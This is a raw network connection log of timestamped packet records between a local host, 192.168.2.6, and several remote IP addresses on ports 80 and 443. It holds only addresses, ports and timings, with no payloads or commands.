Nov 23, 2024 07:09:20.692559958 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.693433046 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.693516016 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.693567038 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.694518089 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.694578886 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.694628000 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.694674015 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.695519924 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.695570946 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.695611954 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.695671082 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.696563959 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.696614981 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.696693897 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.696763039 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.697603941 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.697698116 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.697705984 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.697834015 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.698704004 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.698776007 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.698860884 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.698916912 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.699687004 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.699744940 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.699785948 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.700012922 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.700719118 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.700771093 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.700814962 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.700862885 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.701745987 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.701814890 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.701832056 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.701886892 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.702811003 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.702861071 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.702900887 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.702948093 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.703991890 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.704010010 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.704070091 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.704070091 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.788728952 CET	443	49722	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:20.789288044 CET	443	49725	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:20.789820910 CET	49722	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:20.789820910 CET	49722	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:20.789865017 CET	443	49722	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:20.789881945 CET	443	49722	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:20.790162086 CET	49725	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:20.790184975 CET	443	49725	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:20.790884018 CET	49725	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:20.790889978 CET	443	49725	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:20.855726004 CET	443	49726	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:20.855745077 CET	443	49724	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:20.856873989 CET	49726	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:20.856873989 CET	49726	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:20.856889009 CET	443	49726	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:20.856905937 CET	443	49726	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:20.857398033 CET	49724	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:20.857405901 CET	443	49724	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:20.859049082 CET	49724	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:20.859056950 CET	443	49724	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:20.916248083 CET	443	49723	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:20.916841984 CET	49723	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:20.916887045 CET	443	49723	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:20.917640924 CET	49723	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:20.917655945 CET	443	49723	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:21.222666979 CET	443	49722	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:21.222738981 CET	443	49722	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:21.223170042 CET	49722	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:21.224705935 CET	49722	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:21.224705935 CET	49722	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:21.224759102 CET	443	49722	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:21.224778891 CET	443	49722	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:21.227905035 CET	443	49725	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:21.227931976 CET	443	49725	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:21.228001118 CET	443	49725	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:21.228028059 CET	49725	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:21.228182077 CET	49725	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:21.232781887 CET	49735	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:21.232825994 CET	443	49735	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:21.233333111 CET	49735	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:21.233398914 CET	49725	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:21.233398914 CET	49725	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:21.233416080 CET	443	49725	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:21.233424902 CET	443	49725	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:21.235013008 CET	49735	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:21.235028982 CET	443	49735	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:21.239020109 CET	49736	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:21.239124060 CET	443	49736	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:21.239701986 CET	49736	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:21.241342068 CET	49736	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:21.241383076 CET	443	49736	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:21.303436041 CET	443	49726	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:21.303522110 CET	443	49726	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:21.303845882 CET	443	49724	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:21.303908110 CET	443	49724	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:21.303991079 CET	49726	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:21.303991079 CET	49724	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:21.304047108 CET	443	49724	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:21.304532051 CET	49724	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:21.307276964 CET	443	49724	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:21.307406902 CET	443	49724	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:21.308367014 CET	49724	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:21.314006090 CET	49726	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:21.314032078 CET	443	49726	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:21.314045906 CET	49726	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:21.314053059 CET	443	49726	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:21.316432953 CET	49724	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:21.316432953 CET	49724	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:21.316442013 CET	443	49724	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:21.316451073 CET	443	49724	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:21.331692934 CET	49737	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:21.331721067 CET	443	49737	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:21.332123995 CET	49737	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:21.341639996 CET	49737	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:21.341651917 CET	443	49737	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:21.354927063 CET	49738	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:21.355016947 CET	443	49738	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:21.355145931 CET	49738	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:21.355642080 CET	49738	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:21.355676889 CET	443	49738	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:21.374625921 CET	443	49723	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:21.374656916 CET	443	49723	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:21.374907017 CET	49723	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:21.374938965 CET	443	49723	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:21.375008106 CET	49723	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:21.381133080 CET	443	49723	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:21.381206989 CET	443	49723	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:21.382193089 CET	49723	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:21.390645027 CET	49723	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:21.390645027 CET	49723	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:21.390666008 CET	443	49723	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:21.390678883 CET	443	49723	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:21.405824900 CET	443	49727	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:21.406157017 CET	49727	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:21.434359074 CET	49739	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:21.434405088 CET	443	49739	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:21.435074091 CET	49739	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:21.447103024 CET	49739	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:21.447122097 CET	443	49739	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:21.448281050 CET	443	49728	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:21.449255943 CET	49728	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:21.482944965 CET	49727	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:21.482959032 CET	443	49727	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:21.487730980 CET	49727	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:21.487739086 CET	443	49727	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:21.495496988 CET	49728	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:21.495503902 CET	443	49728	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:21.559854031 CET	443	49729	2.16.158.90	192.168.2.6
Nov 23, 2024 07:09:21.560115099 CET	49729	443	192.168.2.6	2.16.158.90
Nov 23, 2024 07:09:21.623886108 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:21.624017000 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:21.630671024 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:21.630806923 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:21.673273087 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:21.674274921 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:21.678467035 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:21.678633928 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:21.739892006 CET	443	49730	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:21.739963055 CET	49730	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:22.012797117 CET	443	49727	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:22.012814999 CET	443	49727	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:22.012875080 CET	49727	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:22.012875080 CET	49727	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:22.012897015 CET	443	49727	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:22.012943029 CET	49727	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:22.371880054 CET	49743	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:22.371916056 CET	443	49743	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:22.371977091 CET	49743	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:22.372107983 CET	49744	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:22.372196913 CET	443	49744	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:22.372262001 CET	49744	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:22.372349024 CET	49743	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:22.372364044 CET	443	49743	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:22.372509003 CET	49744	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:22.372559071 CET	443	49744	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:22.466550112 CET	49745	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:22.466595888 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:22.466650963 CET	49745	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:22.466875076 CET	49745	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:22.466895103 CET	443	49745	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:22.481110096 CET	49746	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:22.481141090 CET	443	49746	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:22.481215000 CET	49746	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:22.481542110 CET	49746	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:22.481563091 CET	443	49746	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:22.610738039 CET	49728	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:22.610800982 CET	443	49728	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:22.653799057 CET	49730	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:22.653824091 CET	443	49730	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:22.665762901 CET	49730	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:22.665781021 CET	443	49730	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:22.684070110 CET	49727	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:22.684104919 CET	443	49727	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:22.759757996 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:22.759792089 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:22.760679007 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:22.760684013 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:22.760680914 CET	49729	443	192.168.2.6	2.16.158.90
Nov 23, 2024 07:09:22.760716915 CET	443	49729	2.16.158.90	192.168.2.6
Nov 23, 2024 07:09:22.760739088 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:22.760911942 CET	49729	443	192.168.2.6	2.16.158.90
Nov 23, 2024 07:09:22.760922909 CET	443	49729	2.16.158.90	192.168.2.6
Nov 23, 2024 07:09:22.760971069 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:22.761006117 CET	443	49729	2.16.158.90	192.168.2.6
Nov 23, 2024 07:09:22.762204885 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:22.762204885 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:22.762218952 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:22.762229919 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:22.762247086 CET	49729	443	192.168.2.6	2.16.158.90
Nov 23, 2024 07:09:22.762511969 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:22.762733936 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:22.763288975 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:22.763288975 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:22.763310909 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:22.763328075 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:22.763458014 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:22.763458014 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:22.763513088 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:22.763544083 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:22.763633013 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:22.764444113 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:22.764545918 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:22.764554024 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.205523968 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.205554962 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.205573082 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.205595016 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.205604076 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.205667973 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.205677986 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.205682039 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.205682039 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.205701113 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.205702066 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.205719948 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.205723047 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.205785990 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.205785036 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.205785990 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.205785036 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.205796003 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.205805063 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.205822945 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.205862999 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.205868959 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.207261086 CET	443	49735	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:23.208338022 CET	443	49736	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:23.208489895 CET	49735	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:23.208563089 CET	443	49735	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:23.209356070 CET	49735	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:23.209372997 CET	443	49735	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:23.209634066 CET	443	49738	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:23.209914923 CET	49736	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:23.209944963 CET	443	49736	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:23.210275888 CET	443	49737	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:23.210386038 CET	49736	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:23.210419893 CET	443	49736	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:23.212655067 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.212675095 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.213114023 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.213135958 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.213288069 CET	49738	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:23.213304043 CET	443	49738	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:23.213342905 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.213926077 CET	49738	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:23.213937998 CET	443	49738	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:23.218493938 CET	49737	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:23.218503952 CET	443	49737	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:23.219013929 CET	49737	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:23.219018936 CET	443	49737	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:23.225646973 CET	443	49739	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:23.226069927 CET	49739	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:23.226078033 CET	443	49739	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:23.227020979 CET	49739	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:23.227029085 CET	443	49739	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:23.243726015 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.243745089 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.243824005 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.243845940 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.244025946 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.246037006 CET	443	49728	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:23.246052980 CET	443	49728	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:23.246227026 CET	49728	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:23.246241093 CET	443	49728	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:23.246253014 CET	443	49728	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:23.246326923 CET	49728	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:23.246326923 CET	49728	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:23.246980906 CET	49728	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:23.246994019 CET	443	49728	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:23.260442972 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.260555029 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.280766010 CET	443	49729	2.16.158.90	192.168.2.6
Nov 23, 2024 07:09:23.280867100 CET	49729	443	192.168.2.6	2.16.158.90
Nov 23, 2024 07:09:23.280936956 CET	443	49729	2.16.158.90	192.168.2.6
Nov 23, 2024 07:09:23.281141043 CET	443	49729	2.16.158.90	192.168.2.6
Nov 23, 2024 07:09:23.281177998 CET	49729	443	192.168.2.6	2.16.158.90
Nov 23, 2024 07:09:23.281236887 CET	49729	443	192.168.2.6	2.16.158.90
Nov 23, 2024 07:09:23.289602041 CET	49729	443	192.168.2.6	2.16.158.90
Nov 23, 2024 07:09:23.289643049 CET	443	49729	2.16.158.90	192.168.2.6
Nov 23, 2024 07:09:23.363395929 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.363421917 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.363564968 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.363575935 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.363675117 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.363687038 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.363708019 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.363712072 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.363759995 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.363779068 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.363790989 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.363805056 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.363821983 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.363828897 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.363838911 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.363843918 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.363945007 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.375102043 CET	443	49730	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:23.375174046 CET	443	49730	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:23.375217915 CET	443	49730	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:23.375273943 CET	49730	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:23.375344038 CET	443	49730	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:23.375380993 CET	49730	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:23.379101992 CET	49730	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:23.421880960 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.421905994 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.421972036 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.422003984 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.422032118 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.422032118 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.422044992 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.422069073 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.422075033 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.422100067 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.422152042 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.422179937 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.422199965 CET	443	49733	150.171.27.10	192.168.2.6
